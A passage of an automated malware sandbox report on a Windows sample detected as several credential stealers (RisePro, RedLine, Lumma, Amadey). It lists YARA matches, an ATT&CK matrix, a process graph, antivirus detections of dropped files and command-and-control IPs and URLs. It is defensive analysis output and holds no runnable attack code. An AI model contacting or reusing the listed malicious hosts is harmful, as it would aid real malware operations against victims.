                                Source: b3168c3d9b.exeBinary or memory string: WIN_81
                                Source: b3168c3d9b.exe, 00000004.00000003.2394975883.0000000001189000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_XP
                                Source: b3168c3d9b.exe, 0000000F.00000002.2493343445.0000000000192000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                                Source: b3168c3d9b.exeBinary or memory string: WIN_XPe
                                Source: b3168c3d9b.exe, 0000000F.00000003.2486053330.0000000001728000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_XPq
                                Source: b3168c3d9b.exeBinary or memory string: WIN_VISTA
                                Source: b3168c3d9b.exeBinary or memory string: WIN_7
                                Source: b3168c3d9b.exeBinary or memory string: WIN_8
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGL
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQL
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEH
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREP
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIU
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHV
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGL
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQL
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEH
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\SQSJKEBWDT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIU
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQL
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEH
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREP
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHV
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREP
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQL
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHV
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIU
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLO
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQL
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYI
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEH
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\TQDFJHPUIU
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHV
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUG
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHV
                                Source: Yara matchFile source: 00000008.00000002.2511321549.0000000001538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.2529795385.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: 2531414c80.exe PID: 7556, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 6188, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 2584, type: MEMORYSTR

                                Remote Access Functionality

                                barindex
                                Yara detected PureLog Stealer
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\alexxxxxxxx[1].exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000148001\alexxxxxxxx.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmp, type: DROPPED
                                Yara detected RedLine Stealer
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\jok[1].exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000152001\jok.exe, type: DROPPED
                                Yara detected RisePro Stealer
                                Source: Yara matchFile source: 00000008.00000002.2516925001.0000000007BDD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000003.2363329164.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000002.2511321549.000000000149E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.2539684694.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000003.2362400081.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000002.2539684694.00000000079D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000014.00000003.2361500183.0000000007A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: 2531414c80.exe PID: 7556, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 6188, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: MPGPH131.exe PID: 2584, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: 2531414c80.exe PID: 8848, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: RageMP131.exe PID: 11696, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\cgrqKzIZDKj22M18G57j8co.zip, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\M5gQOMOo3fGmoJBomt4v2FX.zip, type: DROPPED
                                Yara detected zgRAT
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmp, type: DROPPED
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_00151204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,4_2_00151204
                                Source: C:\Users\user\AppData\Local\Temp\1000008001\b3168c3d9b.exeCode function: 4_2_00151806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,4_2_00151806

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity InformationAcquire Infrastructure2
                                Valid Accounts                                		1
                                Windows Management Instrumentation                                		1
                                DLL Side-Loading                                		1
                                Exploitation for Privilege Escalation                                		111
                                Disable or Modify Tools                                		2
                                OS Credential Dumping                                		2
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		1
                                Ingress Tool Transfer                                		Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts1
                                Native API                                		2
                                Valid Accounts                                		1
                                DLL Side-Loading                                		1
                                Deobfuscate/Decode Files or Information                                		31
                                Input Capture                                		1
                                Account Discovery                                		Remote Desktop Protocol41
                                Data from Local System                                		2
                                Encrypted Channel                                		Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts1
                                Exploitation for Client Execution                                		11
                                Scheduled Task/Job                                		2
                                Valid Accounts                                		3
                                Obfuscated Files or Information                                		1
                                Credentials in Registry                                		13
                                File and Directory Discovery                                		SMB/Windows Admin Shares1
                                Email Collection                                		1
                                Application Layer Protocol                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts2
                                Command and Scripting Interpreter                                		121
                                Registry Run Keys / Startup Folder                                		21
                                Access Token Manipulation                                		1
                                Install Root Certificate                                		1
                                Credentials In Files                                		249
                                System Information Discovery                                		Distributed Component Object Model31
                                Input Capture                                		Protocol ImpersonationTraffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud Accounts11
                                Scheduled Task/Job                                		Network Logon Script412
                                Process Injection                                		13
                                Software Packing                                		LSA Secrets1081
                                Security Software Discovery                                		SSH3
                                Clipboard Data                                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                                Scheduled Task/Job                                		1
                                Timestomp                                		Cached Domain Credentials581
                                Virtualization/Sandbox Evasion                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items121
                                Registry Run Keys / Startup Folder                                		1
                                DLL Side-Loading                                		DCSync3
                                Process Discovery                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                                Masquerading                                		Proc Filesystem11
                                Application Window Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                                Valid Accounts                                		/etc/passwd and /etc/shadow1
                                System Owner/User Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron581
                                Virtualization/Sandbox Evasion                                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
                                Access Token Manipulation                                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task412
                                Process Injection                                		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                                Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                                Rundll32                                		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1430545 Sample: file.exe Startdate: 23/04/2024 Architecture: WINDOWS Score: 100 164 Found malware configuration 2->164 166 Malicious sample detected (through community Yara rule) 2->166 168 Antivirus / Scanner detection for submitted sample 2->168 170 16 other signatures 2->170 9 file.exe 5 2->9         started        13 chrosha.exe 2->13         started        16 MPGPH131.exe 2->16         started        18 14 other processes 2->18 process3 dnsIp4 104 C:\Users\user\AppData\Local\...\explorta.exe, PE32 9->104 dropped 212 Detected unpacking (changes PE section rights) 9->212 214 Tries to evade debugger and weak emulator (self modifying code) 9->214 216 Tries to detect virtualization through RDTSC time measurements 9->216 20 explorta.exe 2 23 9->20         started        142 185.172.128.19 NADYMSS-ASRU Russian Federation 13->142 144 77.221.151.47 INFOBOX-ASInfoboxruAutonomousSystemRU Russian Federation 13->144 146 193.233.132.234 FREE-NET-ASFREEnetEU Russian Federation 13->146 106 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32+ 13->106 dropped 108 C:\Users\user\AppData\Roaming\...\clip64.dll, PE32 13->108 dropped 110 C:\Users\user\AppData\Local\...\install.exe, PE32 13->110 dropped 118 17 other malicious files 13->118 dropped 218 Hides threads from debuggers 13->218 236 2 other signatures 13->236 25 swiiiii.exe 13->25         started        27 rundll32.exe 13->27         started        220 Antivirus detection for dropped file 16->220 222 Tries to steal Mail credentials (via file / registry access) 16->222 224 Machine Learning detection for dropped file 16->224 226 Found many strings related to Crypto-Wallets (likely being stolen) 16->226 29 WerFault.exe 16->29         started        148 23.221.242.90 TISCALI-IT United States 18->148 150 40.126.28.22 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 18->150 152 2 other IPs or domains 18->152 112 SystemMechanic_548...38868BD1.exe (copy), PE32 18->112 dropped 114 C:\Users\user\AppData\Local\...\BIT1659.tmp, PE32 18->114 dropped 116 C:\Users\user\...\M5gQOMOo3fGmoJBomt4v2FX.zip, Zip 18->116 dropped 228 Multi AV Scanner detection for dropped file 18->228 230 Benign windows process drops PE files 18->230 232 Binary is likely a compiled AutoIt script file 18->232 234 Tries to harvest and steal browser information (history, passwords, etc) 18->234 31 chrome.exe 18->31         started        33 chrome.exe 18->33         started        35 WerFault.exe 18->35         started        37 4 other processes 18->37 file5 signatures6 process7 dnsIp8 120 193.233.132.139 FREE-NET-ASFREEnetEU Russian Federation 20->120 122 193.233.132.167 FREE-NET-ASFREEnetEU Russian Federation 20->122 88 C:\Users\user\AppData\Local\...\amert.exe, PE32 20->88 dropped 90 C:\Users\user\AppData\...\2531414c80.exe, PE32 20->90 dropped 92 C:\Users\user\AppData\...\b3168c3d9b.exe, PE32 20->92 dropped 94 4 other malicious files 20->94 dropped 172 Multi AV Scanner detection for dropped file 20->172 174 Detected unpacking (changes PE section rights) 20->174 176 Tries to detect sandboxes and other dynamic analysis tools (window names) 20->176 184 5 other signatures 20->184 39 2531414c80.exe 6 61 20->39         started        44 amert.exe 20->44         started        46 b3168c3d9b.exe 1 20->46         started        48 explorta.exe 20->48         started        178 Writes to foreign memory regions 25->178 180 Allocates memory in foreign processes 25->180 182 Injects a PE file into a foreign processes 25->182 50 RegAsm.exe 25->50         started        58 2 other processes 25->58 52 rundll32.exe 27->52         started        54 chrome.exe 31->54         started        56 chrome.exe 33->56         started        file9 signatures10 process11 dnsIp12 124 34.117.186.192 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 39->124 126 147.45.47.93 FREE-NET-ASFREEnetEU Russian Federation 39->126 128 172.67.75.166 CLOUDFLARENETUS United States 39->128 96 C:\Users\user\AppData\Local\...\RageMP131.exe, PE32 39->96 dropped 98 C:\ProgramData\MPGPH131\MPGPH131.exe, PE32 39->98 dropped 100 C:\Users\user\...\cgrqKzIZDKj22M18G57j8co.zip, Zip 39->100 dropped 186 Detected unpacking (changes PE section rights) 39->186 188 Tries to steal Mail credentials (via file / registry access) 39->188 202 6 other signatures 39->202 60 WerFault.exe 39->60         started        63 schtasks.exe 39->63         started        65 schtasks.exe 39->65         started        102 C:\Users\user\AppData\Local\...\chrosha.exe, PE32 44->102 dropped 190 Multi AV Scanner detection for dropped file 44->190 204 3 other signatures 44->204 192 Binary is likely a compiled AutoIt script file 46->192 206 2 other signatures 46->206 67 chrome.exe 9 46->67         started        130 104.21.67.211 CLOUDFLARENETUS United States 50->130 194 Query firmware table information (likely to detect VMs) 50->194 196 Installs new ROOT certificates 50->196 208 2 other signatures 50->208 198 System process connects to network (likely due to code injection or exploit) 52->198 200 Tries to steal Instant Messenger accounts or passwords 52->200 210 3 other signatures 52->210 69 netsh.exe 52->69         started        132 52.182.143.212 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 58->132 file13 signatures14 process15 dnsIp16 134 20.42.65.92 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 60->134 71 Conhost.exe 60->71         started        73 conhost.exe 63->73         started        75 conhost.exe 65->75         started        136 192.168.2.4 unknown unknown 67->136 138 192.168.2.5 unknown unknown 67->138 140 2 other IPs or domains 67->140 77 chrome.exe 67->77         started        80 chrome.exe 67->80         started        82 chrome.exe 67->82         started        86 2 other processes 67->86 84 conhost.exe 69->84         started        process17 dnsIp18 154 142.250.105.147 GOOGLEUS United States 77->154 156 142.250.105.84 GOOGLEUS United States 77->156 162 9 other IPs or domains 77->162 158 64.233.176.101 GOOGLEUS United States 80->158 160 64.233.185.102 GOOGLEUS United States 82->160

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                file.exe47%ReversingLabsWin32.Trojan.RisePro
                                file.exe100%AviraTR/Crypt.TPM.Gen
                                file.exe100%Joe Sandbox ML

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\ProgramData\MPGPH131\MPGPH131.exe100%AviraHEUR/AGEN.1360556
                                C:\ProgramData\MPGPH131\MPGPH131.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\NewB[1].exe76%ReversingLabsWin32.Trojan.Malgent
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\amert[1].exe45%ReversingLabsWin32.Trojan.RisePro
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sarra[1].exe51%ReversingLabsWin32.Trojan.RisePro
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\swiiii[1].exe92%ReversingLabsByteCode-MSIL.Trojan.RedLine
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\gold[1].exe67%ReversingLabsWin32.Spyware.Lummastealer
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\jok[1].exe92%ReversingLabsByteCode-MSIL.Trojan.RedLine
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\cred64[1].dll92%ReversingLabsWin64.Trojan.Amadey
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\file300un[1].exe30%ReversingLabsByteCode-MSIL.Trojan.Amadey
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\swiiiii[1].exe92%ReversingLabsByteCode-MSIL.Trojan.LummaStealer
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\alexxxxxxxx[1].exe96%ReversingLabsByteCode-MSIL.Trojan.PureLogStealer
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\clip64[1].dll96%ReversingLabsWin32.Trojan.Amadey
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\install[1].exe21%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\1000012001\amert.exe45%ReversingLabsWin32.Trojan.RisePro
                                C:\Users\user\AppData\Local\Temp\1000147001\swiiiii.exe92%ReversingLabsByteCode-MSIL.Trojan.LummaStealer
                                C:\Users\user\AppData\Local\Temp\1000148001\alexxxxxxxx.exe96%ReversingLabsByteCode-MSIL.Trojan.PureLogStealer
                                C:\Users\user\AppData\Local\Temp\1000149001\gold.exe67%ReversingLabsWin32.Spyware.Lummastealer
                                C:\Users\user\AppData\Local\Temp\1000150001\NewB.exe76%ReversingLabsWin32.Trojan.Malgent
                                C:\Users\user\AppData\Local\Temp\1000152001\jok.exe92%ReversingLabsByteCode-MSIL.Trojan.RedLine
                                C:\Users\user\AppData\Local\Temp\1000153001\swiiii.exe92%ReversingLabsByteCode-MSIL.Trojan.RedLine
                                C:\Users\user\AppData\Local\Temp\1000181001\file300un.exe30%ReversingLabsByteCode-MSIL.Trojan.Amadey
                                C:\Users\user\AppData\Local\Temp\1000208001\install.exe21%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe45%ReversingLabsWin32.Trojan.RisePro
                                C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe47%ReversingLabsWin32.Trojan.RisePro
                                C:\Users\user\AppData\Local\Temp\iolo\dm\BIT1659.tmp12%ReversingLabs
                                C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (copy)12%ReversingLabs
                                C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll96%ReversingLabsWin32.Trojan.Amadey
                                C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll92%ReversingLabsWin64.Trojan.Amadey

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                No Antivirus matches

                                Domains and IPs

                                Contacted Domains

                                No contacted domains info

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://193.233.132.139/explorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmptrue
                                  https://duckduckgo.com/chrome_newtab2531414c80.exe, 00000008.00000003.2242125637.0000000007CFA000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2239114261.0000000007C55000.00000004.00000020.00020000.00000000.sdmp, 2531414c80.exe, 00000008.00000003.2249859344.0000000007C5F000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2304428591.0000000007EF9000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2306217637.0000000007F21000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000013.00000003.2347869504.0000000008820000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2298437366.0000000007A30000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2293320807.0000000007AAA000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000014.00000003.2344760612.0000000007A30000.00000004.00000020.00020000.00000000.sdmpfalse
                                    http://193.233.132.139/sev56rkm/index.php12001explorta.exe, 00000002.00000002.3253602072.00000000014F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                      https://db-ip.com:443/demo/home.php?s=89.187.171.132PMPGPH131.exe, 00000013.00000002.2500776200.000000000177F000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 0000001F.00000002.2450136740.0000000001515000.00000004.00000020.00020000.00000000.sdmpfalse
                                        http://193.233.132.139/f1daa8e86e8e8fda7df3081405eac52aa495c49#bexplorta.exe, 00000002.00000002.3253602072.0000000001505000.00000004.00000020.00020000.00000000.sdmpfalse
